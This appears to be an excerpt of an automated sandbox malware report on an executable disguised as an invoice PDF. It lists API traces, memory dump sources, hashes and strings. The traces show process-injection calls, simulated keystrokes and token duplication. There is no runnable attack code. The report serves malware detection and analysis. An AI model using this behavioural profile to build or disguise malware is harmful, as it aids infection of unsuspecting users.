                                                                              • Opcode ID: c74911371e76cb9dc4786cfdbe28690debad29cef5acae8c4501fea9e7903076
                                                                              • Instruction ID: c8a12bf2a45d0ac11074f8cac28b928f9e20b60047ac9024d749846706a082ab
                                                                              • Opcode Fuzzy Hash: c74911371e76cb9dc4786cfdbe28690debad29cef5acae8c4501fea9e7903076
                                                                              • Instruction Fuzzy Hash: 32012971C00609FBCF22AF65DC029DF3B31AF44714F04815BF82416261D7798AA2DF99
                                                                              APIs
                                                                                • Part of subcall function 00417F23: __getptd_noexit.LIBCMT ref: 00417F23
                                                                                • Part of subcall function 00417EBB: __decode_pointer.LIBCMT ref: 00417EC6
                                                                              • __lock_file.LIBCMT ref: 00414EE4
                                                                                • Part of subcall function 00415965: __lock.LIBCMT ref: 0041598A
                                                                              • __fclose_nolock.LIBCMT ref: 00414EEE
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: __decode_pointer__fclose_nolock__getptd_noexit__lock__lock_file
                                                                              • String ID:
                                                                              • API String ID: 717694121-0
                                                                              • Opcode ID: 6051778e024176e7de16a1974b8d1b3b80c3b8a23747dfcb666cdf4e7799d8f6
                                                                              • Instruction ID: 225a509e04b880138f2478077c57af59103cae2c072c29012e7845c0956b1514
                                                                              • Opcode Fuzzy Hash: 6051778e024176e7de16a1974b8d1b3b80c3b8a23747dfcb666cdf4e7799d8f6
                                                                              • Instruction Fuzzy Hash: DEF06270D0470499C721BB6A9802ADE7AB0AFC1338F21864FE479A72D1C77C46C29F5D
                                                                              APIs
                                                                              • CreateProcessW.KERNELBASE(?,00000000), ref: 02E53AAB
                                                                              • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 02E53B41
                                                                              • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 02E53B63
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2042513613.0000000002E52000.00000040.00000020.00020000.00000000.sdmp, Offset: 02E52000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_2e52000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                                              • String ID:
                                                                              • API String ID: 2438371351-0
                                                                              • Opcode ID: 45c0bcdfd50c24934144be52d4489c8f4aeee23b26077383fd0484b0fd6f3e51
                                                                              • Instruction ID: 2e623b754f71f01783c897f5a86f80c120c89570caff924caa98547f7a843a97
                                                                              • Opcode Fuzzy Hash: 45c0bcdfd50c24934144be52d4489c8f4aeee23b26077383fd0484b0fd6f3e51
                                                                              • Instruction Fuzzy Hash: 3612D324E24658C6EB24DF64D8507DEB232EF68340F1090E9910DEB7A5E77A4F81CF5A
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: ProtectVirtual
                                                                              • String ID:
                                                                              • API String ID: 544645111-0
                                                                              • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                              • Instruction ID: fb1d736feddc8336b94c661b4f3a99b04f66f7614ca83ae43ac4a02a862e88ab
                                                                              • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                              • Instruction Fuzzy Hash: 1331D574A00105DFC718DF99E490AAAFBA6FB49304B2486A6E409CB751D774EDC1CBC5
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: a12857963b59ba27d86be744ec8e6ce9272b51880a9e98fb69d1fc4369ccfb77
                                                                              • Instruction ID: 573dba848690e0cdfd4c9be45b5663ff9194aa529e9341154cf92adfcd841cf8
                                                                              • Opcode Fuzzy Hash: a12857963b59ba27d86be744ec8e6ce9272b51880a9e98fb69d1fc4369ccfb77
                                                                              • Instruction Fuzzy Hash: 5E11C374200200ABC7249FAAD8D5F2A73A5AF45304B244C6FE845E7392D73CEC81EB5E
                                                                              APIs
                                                                              • __lock_file.LIBCMT ref: 00414715
                                                                                • Part of subcall function 00417F23: __getptd_noexit.LIBCMT ref: 00417F23
                                                                                • Part of subcall function 00417EBB: __decode_pointer.LIBCMT ref: 00417EC6
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: __decode_pointer__getptd_noexit__lock_file
                                                                              • String ID:
                                                                              • API String ID: 3158947991-0
                                                                              • Opcode ID: 085163d9d6c6b92529dffeffa933b442a69769718ab4c3f036a6efc1e6619a91
                                                                              • Instruction ID: 976453b5b1ee2f3d44d02422b4ffd36af57946720b8a5c914dc71ca3f0d289f9
                                                                              • Opcode Fuzzy Hash: 085163d9d6c6b92529dffeffa933b442a69769718ab4c3f036a6efc1e6619a91
                                                                              • Instruction Fuzzy Hash: 92F08C70901219EBCF22BFA1CC024DE3B71AF42710F00855AF42466291C73D8AA1AB99
                                                                              APIs
                                                                              • DefWindowProcW.USER32(?,?,?,?), ref: 00401123
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: ProcWindow
                                                                              • String ID:
                                                                              • API String ID: 181713994-0
                                                                              • Opcode ID: 2bcff8431ba1ff294e2b1c33dceaa93ee25f984dfbecb3b506615433fd530346
                                                                              • Instruction ID: 72bdf1ad184d721e15e17473fba0dc1faec6c1a9a9d1f3fcb71c15abd8c9f185
                                                                              • Opcode Fuzzy Hash: 2bcff8431ba1ff294e2b1c33dceaa93ee25f984dfbecb3b506615433fd530346
                                                                              • Instruction Fuzzy Hash: FDF05436700118A7DF38995CE89ACFF632AD7ED350F418227FD152B3A6813C5C41966E
                                                                              APIs
                                                                              • HeapCreate.KERNELBASE(00000000,00001000,00000000), ref: 0041AA46
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: CreateHeap
                                                                              • String ID:
                                                                              • API String ID: 10892065-0
                                                                              • Opcode ID: 715419928b85d2867e9ba06f33a68846dd0d9c70f7b25bc38942ce62b1fa172d
                                                                              • Instruction ID: 99ddfbee892492b32903703907324a593b21f4d4a70cf9c354be63060b8faba1
                                                                              • Opcode Fuzzy Hash: 715419928b85d2867e9ba06f33a68846dd0d9c70f7b25bc38942ce62b1fa172d
                                                                              • Instruction Fuzzy Hash: 56D05E325543449EDF009F71AC087663FDCE788395F008836BC1CC6150E778C950CA08
                                                                              APIs
                                                                              • DefWindowProcW.USER32(?,?,?,?), ref: 00401123
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: ProcWindow
                                                                              • String ID:
                                                                              • API String ID: 181713994-0
                                                                              • Opcode ID: 837c1f5b160989e4bc04331483680d437582dbd9ffcfcea34caefcb6c1da81af
                                                                              • Instruction ID: 4c36cba44089d0e03573cc5e8dee84df23505be31ebc2729507753268ee0d302
                                                                              • Opcode Fuzzy Hash: 837c1f5b160989e4bc04331483680d437582dbd9ffcfcea34caefcb6c1da81af
                                                                              • Instruction Fuzzy Hash: C3C08C72100008BB8700DE04EC44CFBB72CEBD8310700C20BBC0586201C230885097A1
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: __wfsopen
                                                                              • String ID:
                                                                              • API String ID: 197181222-0
                                                                              • Opcode ID: d1a4d26266dcb7911ef956bf4afcad96e19892d5a9e8770749e386b2bd63db79
                                                                              • Instruction ID: 6225ca515e7db1e5d7746fb8cf1e0ad45b41b4d1817cc5a1d8a93eb941133566
                                                                              • Opcode Fuzzy Hash: d1a4d26266dcb7911ef956bf4afcad96e19892d5a9e8770749e386b2bd63db79
                                                                              • Instruction Fuzzy Hash: EDC09B7644010C77CF122943FC02E453F1997C0764F044011FB1C1D561D577D5619589
                                                                              APIs
                                                                              • Sleep.KERNELBASE(000001F4), ref: 02E54301
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2042513613.0000000002E52000.00000040.00000020.00020000.00000000.sdmp, Offset: 02E52000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_2e52000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: Sleep
                                                                              • String ID:
                                                                              • API String ID: 3472027048-0
                                                                              • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                              • Instruction ID: bfc2aaa3b8df8e55acfd1f7f2258008ad3b7dd463eba0a66fc96f126af8ea115
                                                                              • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                              • Instruction Fuzzy Hash: 1CE0E67498010DDFDB00EFF4D54969E7FB4EF04301F104161FD01D2291D6309D508A62
                                                                              APIs
                                                                              • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0047C158
                                                                              • DefDlgProcW.USER32(?,0000004E,?,?,004A83D8,?,004A83D8,?), ref: 0047C173
                                                                              • GetKeyState.USER32(00000011), ref: 0047C1A4
                                                                              • GetKeyState.USER32(00000009), ref: 0047C1AD
                                                                              • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0047C1C0
                                                                              • GetKeyState.USER32(00000010), ref: 0047C1CA
                                                                              • GetWindowLongW.USER32(00000002,000000F0), ref: 0047C1DE
                                                                              • SendMessageW.USER32(00000002,0000110A,00000009,00000000), ref: 0047C20A
                                                                              • SendMessageW.USER32(00000002,0000113E,00000000,?), ref: 0047C22D
                                                                              • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0047C2D6
                                                                              • SendMessageW.USER32 ref: 0047C2FB
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend$State$LongProcWindow
                                                                              • String ID: @GUI_DRAGID$F
                                                                              • API String ID: 1562745308-4164748364
                                                                              • Opcode ID: dcc01cbd87ddd492c2c278cbacd50e58f25e8ccd866e9ebab9dee97b514268e5
                                                                              • Instruction ID: f40edf6d5039c675f00343e7880f865f139be9e64e9b8d530a61de5f06f6045f
                                                                              • Opcode Fuzzy Hash: dcc01cbd87ddd492c2c278cbacd50e58f25e8ccd866e9ebab9dee97b514268e5
                                                                              • Instruction Fuzzy Hash: C6429F702042019FD714CF54C884FAB77A5EB89B04F548A6EFA48AB291DBB4EC45CB5A
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: PF$'|G$*"D$*vG$+%F$0wE$2G$5CG$7eF$<HF$<G$ApG$DvE$GSG$IqE$K@G$LbF$MdF$NgF$PIF$YtG$^[F$_?G$b"D$i}G$j)F$kQG$lE$rTG$vjE$}eE$*F$3G$_G$wG
                                                                              • API String ID: 0-3772701627
                                                                              • Opcode ID: bb854585b2a8d25cf70b859c951904b6599901827447d171664d6ae6ba41e592
                                                                              • Instruction ID: b1e67458769bbea4a86cd8903524db5b6e79558e2e7ab8c51025fc7bd56032a7
                                                                              • Opcode Fuzzy Hash: bb854585b2a8d25cf70b859c951904b6599901827447d171664d6ae6ba41e592
                                                                              • Instruction Fuzzy Hash: 118366F1905B409FC351DFAAF984605BAE1F3AA3157A2857FC5088B731D7B8194A8F4C
                                                                              APIs
                                                                              • GetForegroundWindow.USER32(00000000,?,?,004448AF,?), ref: 004375B3
                                                                              • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 004375D8
                                                                              • IsIconic.USER32(?), ref: 004375E1
                                                                              • ShowWindow.USER32(?,00000009,?,?,004448AF,?), ref: 004375EE
                                                                              • SetForegroundWindow.USER32(?), ref: 004375FD
                                                                              • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00437615
                                                                              • GetCurrentThreadId.KERNEL32 ref: 00437619
                                                                              • GetWindowThreadProcessId.USER32(?,00000000), ref: 00437624
                                                                              • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,004448AF,?), ref: 00437632
                                                                              • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,004448AF,?), ref: 00437638
                                                                              • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,004448AF,?), ref: 0043763E
                                                                              • SetForegroundWindow.USER32(?), ref: 00437645
                                                                              • MapVirtualKeyW.USER32(00000012,00000000), ref: 00437654
                                                                              • keybd_event.USER32(00000012,00000000), ref: 0043765D
                                                                              • MapVirtualKeyW.USER32(00000012,00000000), ref: 0043766B
                                                                              • keybd_event.USER32(00000012,00000000), ref: 00437674
                                                                              • MapVirtualKeyW.USER32(00000012,00000000), ref: 00437682
                                                                              • keybd_event.USER32(00000012,00000000), ref: 0043768B
                                                                              • MapVirtualKeyW.USER32(00000012,00000000), ref: 00437699
                                                                              • keybd_event.USER32(00000012,00000000), ref: 004376A2
                                                                              • SetForegroundWindow.USER32(?), ref: 004376AD
                                                                              • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,004448AF), ref: 004376CD
                                                                              • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,004448AF), ref: 004376D3
                                                                              • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,004448AF), ref: 004376D9
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: Thread$Window$AttachInput$ForegroundVirtualkeybd_event$Process$CurrentFindIconicShow
                                                                              • String ID: Shell_TrayWnd
                                                                              • API String ID: 3778422247-2988720461
                                                                              • Opcode ID: ec12ba9e870cc2e5dd85ad52799cb15a6745d125a488419c4f0ebb71fc1ee38e
                                                                              • Instruction ID: 6108fbe056c1a000d5481f33e03d330ccc862392245923d3170deea12ea07584
                                                                              • Opcode Fuzzy Hash: ec12ba9e870cc2e5dd85ad52799cb15a6745d125a488419c4f0ebb71fc1ee38e
                                                                              • Instruction Fuzzy Hash: AC31A4712803157FE6245BA59D0EF7F3F9CEB48B51F10082EFA02EA1D1DAE458009B79
                                                                              APIs
                                                                              • _memset.LIBCMT ref: 0044621B
                                                                              • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,?,?,?,?,?,?,?), ref: 00446277
                                                                              • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0044628A
                                                                              • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 004462A4
                                                                              • GetProcessWindowStation.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 004462BD
                                                                              • SetProcessWindowStation.USER32(00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004462C8
                                                                              • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 004462E4
                                                                              • _wcslen.LIBCMT ref: 0044639E
                                                                                • Part of subcall function 0041171A: _malloc.LIBCMT ref: 00411734
                                                                              • _wcsncpy.LIBCMT ref: 004463C7
                                                                              • LoadUserProfileW.USERENV(?,00000000,00000000,?,?,00000000,?,?,?,?), ref: 004463E7
                                                                              • CreateEnvironmentBlock.USERENV(?,?,00000000,00000000,?,?,00000000,?,?,?,?), ref: 00446408
                                                                              • CreateProcessAsUserW.ADVAPI32(?,00000000,00000000,00000000,00000000,?,?,?,?,?,?,00000000,?,?,00000000,?), ref: 00446446
                                                                              • UnloadUserProfile.USERENV(?,?,?,?,?,?,?), ref: 00446483
                                                                              • CloseWindowStation.USER32(00000000,?,?,?,?), ref: 00446497
                                                                              • CloseDesktop.USER32(00000000,?,?,?,?), ref: 0044649E
                                                                              • SetProcessWindowStation.USER32(?,?,?,?,?), ref: 004464A9
                                                                              • CloseHandle.KERNEL32(?,?,?,?,?), ref: 004464B4
                                                                              • DestroyEnvironmentBlock.USERENV(?,?,?,?,?,?), ref: 004464C8
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: StationWindow$CloseProcess$User$BlockCreateDesktopEnvironmentHandleOpenProfile$DestroyDuplicateLoadTokenUnload_malloc_memset_wcslen_wcsncpy
                                                                              • String ID: $default$winsta0
                                                                              • API String ID: 2173856841-1027155976
                                                                              • Opcode ID: 05b9397f8b4714607c622f001828b7a188a4c98331011edd3f265004302c4541
                                                                              • Instruction ID: eafd5d154f9bcf2590b8f8eb1e0f3d39b01f77f2fd200ee1cb9c7344d9c52646
                                                                              • Opcode Fuzzy Hash: 05b9397f8b4714607c622f001828b7a188a4c98331011edd3f265004302c4541
                                                                              • Instruction Fuzzy Hash: DD819170208341AFE724DF65C848B6FBBE8AF89744F04491DF69097291DBB8D805CB6B
                                                                              APIs
                                                                              • _wcslen.LIBCMT ref: 00409A61
                                                                                • Part of subcall function 0041171A: _malloc.LIBCMT ref: 00411734
                                                                                • Part of subcall function 0041171A: std::bad_alloc::bad_alloc.LIBCMT ref: 00411757
                                                                                • Part of subcall function 0041171A: std::bad_exception::bad_exception.LIBCMT ref: 0041176B
                                                                                • Part of subcall function 0041171A: __CxxThrowException@8.LIBCMT ref: 00411779
                                                                              • CharUpperBuffW.USER32(?,?), ref: 00409AF5
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: BuffCharException@8ThrowUpper_malloc_wcslenstd::bad_alloc::bad_allocstd::bad_exception::bad_exception
                                                                              • String ID: 0vH$4RH
                                                                              • API String ID: 1143807570-2085553193
                                                                              • Opcode ID: 1d5cbb74606dd6a81ce58a88a9b9829abaae443ffbb79d27510ca3c232fab2f4
                                                                              • Instruction ID: 7c8f52bff4b3ea9a641e6aac08ab5e1c8beb32691f0f21fab5f23224d73a3634
                                                                              • Opcode Fuzzy Hash: 1d5cbb74606dd6a81ce58a88a9b9829abaae443ffbb79d27510ca3c232fab2f4
                                                                              • Instruction Fuzzy Hash: 34238170A043109FD724DF25D480A6BB7E1BF89304F54896EE84A9B391D739EC46CB9B
                                                                              APIs
                                                                                • Part of subcall function 0040FFB0: GetFullPathNameW.KERNEL32(00000000,00000104,C:\Users\user\Desktop\Outstanding Invoices Spreadsheet Scan 00495_PDF.exe,?,C:\Users\user\Desktop\Outstanding Invoices Spreadsheet Scan 00495_PDF.exe,004A8E80,C:\Users\user\Desktop\Outstanding Invoices Spreadsheet Scan 00495_PDF.exe,0040F3D2), ref: 0040FFCA
                                                                                • Part of subcall function 00436A1D: __wsplitpath.LIBCMT ref: 00436A45
                                                                                • Part of subcall function 00436A1D: __wsplitpath.LIBCMT ref: 00436A6C
                                                                                • Part of subcall function 00436A1D: __wcsicoll.LIBCMT ref: 00436A93
                                                                                • Part of subcall function 00436AC4: GetFileAttributesW.KERNEL32(?,0044BD82,?,?,?), ref: 00436AC9
                                                                              • _wcscat.LIBCMT ref: 0044BD96
                                                                              • _wcscat.LIBCMT ref: 0044BDBF
                                                                              • __wsplitpath.LIBCMT ref: 0044BDEC
                                                                              • FindFirstFileW.KERNEL32(?,?), ref: 0044BE04
                                                                              • _wcscpy.LIBCMT ref: 0044BE73
                                                                              • _wcscat.LIBCMT ref: 0044BE85
